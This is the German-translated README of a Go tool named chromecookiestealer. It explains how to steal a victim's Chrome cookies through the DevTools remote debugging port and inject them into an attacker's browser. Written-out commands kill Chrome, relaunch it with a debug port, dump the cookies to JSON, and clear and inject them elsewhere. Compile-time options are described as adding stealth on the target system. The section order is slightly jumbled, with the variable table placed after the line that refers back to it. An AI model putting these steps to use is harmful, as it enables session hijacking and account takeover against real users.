
Stehlen/Einschleusen von Chrome-Cookies über das DevTools-Protokoll (--remote-debugging-port).
Hängt sich mit Remote DevTools-Protokoll an Chrome an und stiehlt/injiziert/löscht/entfernt Cookies.
Stark inspiriert von WhiteChocolateMacademiaNut.
Cookies werden als JSON-Objekte mit Chromes eigenem Format ausgegeben. Das gleiche Format wird für zu ladende Cookies verwendet.
Nur zur legalen Nutzung.
Stehlen Sie die Cookies eines Opfers:
git clone https://github.com/magisterquis/chromecookiestealer.git
cd chromecookiestealer
go build
pkill Chrome
/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --restore-last-session # Varies by target
./chromecookiestealer -dump ./cookies.json
In den lokalen Browser des Angreifers injizieren:
# Start Chrome with a debug port, as above.
./chromecookiestealer -clear -inject ./cookies.json
Usage: chromecookiestealer [options]
Attaches to Chrome using the Remote DevTools Protocol (--remote-debugging-port)
and, in order and as requested:
- Dumps cookies
- Clears cookies
- Injects cookies
- Deletes selected cookies
Parameters for cookies to be deleted should be represented as an array of JSON
objects with the following string fields:
name - Name of the cookies to remove.
url - If specified, deletes all the cookies with the given name where domain
and path match provided URL.
domain - If specified, deletes only cookies with the exact domain.
path - If specified, deletes only cookies with the exact path.
Filenames may also be "-" for stdin/stdout.
Options:
-chrome URL
Chrome remote debugging URL (default "ws://127.0.0.1:9222")
-clear
Clear browser cookies
-delete file
Name of file containing parameters for cookies to delete
-dump file
Name of file to which to dump stolen cookies
-inject file
Name of file containing cookies to inject
-no-summary
Don't print a summary on exit
-verbose
Enable verbose logging
go build sollte alles sein, was nötig ist. Die folgenden Optionen können zur
Kompilierzeit mit -ldflags '-X main.Foo=bar' gesetzt werden, für etwas mehr
Tarnung auf dem Zielsystem.
Keine der oben genannten sind standardmäßig gesetzt.
Das Chrome DevTools-Protokoll ist ein sich bewegendes Ziel. Es kann notwendig sein, eine neuere Version der chromedp- und cdproto-Bibliotheken zu verwenden, falls dieses Programm nicht mehr funktioniert. Dies kann mit
go get -u -v all
go mod tidy
go build
erledigt werden, was durchaus den Nebeneffekt haben könnte, alles andere zu zerstören.
¯\_(ツ)_/¯
| Variable | Beschreibung |
|---|
| DumpFile | Name einer Datei, in die Cookies ausgegeben werden sollen. Impliziert -dump |
| InjectFile | Name einer Datei, aus der Cookies injiziert werden sollen. Impliziert -inject |
| DeleteFile | Name einer Datei mit Parametern, die zu löschende Cookies beschreiben. Impliziert -delete |
| DoClear | Wenn auf einen beliebigen Wert gesetzt, impliziert -clear |